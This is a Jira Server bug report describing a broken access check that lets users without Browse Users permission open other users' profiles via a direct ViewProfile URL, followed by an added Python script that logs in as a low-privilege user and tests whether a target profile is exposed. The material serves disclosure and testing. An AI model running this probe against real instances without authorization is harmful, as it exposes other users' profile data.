Details
- Bug
- Resolution: Timed out
- Medium
- None
- 7.5.1, 7.6.7, 7.10.2, 7.12.0
- None
- 7.05
- 1
- Severity 2 - Major
Description
Summary
When a non-admin user who has no Browse Users permission is logged in to JIRA and requests the profile URL directly (which only requires guessing or knowing another user's username), the other user's profile is displayed even though Browse Users has not been granted.
Steps to Reproduce
- Create a test user and grant it application access (for example, Jira Software).
- Ensure that this user has no Browse Users global permission, directly or through any of its groups.
- Log in as the test user, then open the Base URL with secure/ViewProfile.jspa?name=anyusername appended, where anyusername is the username of some other existing user.
Expected Behavior
User is not able to view the profile.
Actual Result
The user is able to see the other user's profile page as long as they know (or can guess) the username.
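The following script automates the reproduction steps above as an added example; it is not part of this issue and not Atlassian code. It logs in as the low-privilege test user through the Jira Server REST session endpoint (/rest/auth/1/session), requests secure/ViewProfile.jspa?name=&lt;target&gt; while following any redirect, and then decides whether a profile page for the target user was actually rendered rather than a login redirect or an error. The element ids it looks for (up-d-username, up-user-title) are assumptions about the Jira 7.x profile page markup and should be checked against your own instance; the names, credentials and HTML bodies in the test are constructed.

```python
"""Probe whether a user without Browse Users can open other users' profiles.

Added example for the JRASERVER report above, not Atlassian code.
Usage: python probe_profile.py https://jira.example.test lowpriv S3cret bob
Exit status 1 means the target's profile was served (bug reproduced).
"""
import json
import re
import sys
import urllib.error
import urllib.request
from dataclasses import dataclass
from http.cookiejar import CookieJar
from urllib.parse import urlencode

# Assumption: a rendered Jira 7.x profile page contains these element ids.
# They are heuristics only; adjust them if your instance renders differently.
PROFILE_MARKERS = ('id="up-d-username"', 'id="up-user-title"')
LOGIN_PATH = "/login.jsp"


def profile_url(base_url: str, username: str) -> str:
    """Build <base>/secure/ViewProfile.jspa?name=<username>, URL-encoding the name."""
    return base_url.rstrip("/") + "/secure/ViewProfile.jspa?" + urlencode({"name": username})


@dataclass
class ProbeResult:
    target: str
    status: int
    exposed: bool
    reason: str


def classify(target: str, status: int, final_url: str, body: str) -> ProbeResult:
    """Decide from status, final URL and body whether the target's profile was served."""
    if status in (401, 403):
        return ProbeResult(target, status, False, "server refused the request")
    if LOGIN_PATH in final_url:
        return ProbeResult(target, status, False, "redirected to login (session not authenticated)")
    if status != 200:
        return ProbeResult(target, status, False, f"unexpected HTTP status {status}")
    has_marker = any(m in body for m in PROFILE_MARKERS)
    # Require the username field to name the *target*: Jira may render the
    # caller's own profile for an unknown name, which is not a leak.
    names_target = re.search(
        r'id="up-d-username"[^>]*>\s*' + re.escape(target) + r"\s*<", body, re.I
    ) is not None
    if has_marker and names_target:
        return ProbeResult(target, status, True, "profile page rendered for the target user")
    if has_marker:
        return ProbeResult(target, status, False, "a profile rendered, but not the target's")
    return ProbeResult(target, status, False, "no profile content in the response")


def probe(base_url: str, username: str, password: str, target: str) -> ProbeResult:
    """Log in as the low-privilege user, then fetch the target's profile page."""
    jar = CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    login = urllib.request.Request(
        base_url.rstrip("/") + "/rest/auth/1/session",
        data=json.dumps({"username": username, "password": password}).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with opener.open(login) as resp:  # raises HTTPError on 401/403
        if resp.status != 200:
            raise SystemExit(f"login failed with HTTP {resp.status}")
    try:
        with opener.open(profile_url(base_url, target)) as resp:
            return classify(target, resp.status, resp.geturl(), resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        # Non-2xx responses still carry a body and final URL worth classifying.
        return classify(target, err.code, err.geturl(), err.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    if len(sys.argv) != 5:
        raise SystemExit(__doc__)
    result = probe(*sys.argv[1:5])
    print(result)
    sys.exit(1 if result.exposed else 0)
```

Run it once with the test user before and after removing Browse Users to confirm the check itself works; with the bug present, the second run still exits 1.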
Workaround
None
Attachments
Issue Links
- relates to JRASERVER-71899 Usernames are exposed in the URL while accessing user profiles (Gathering Impact)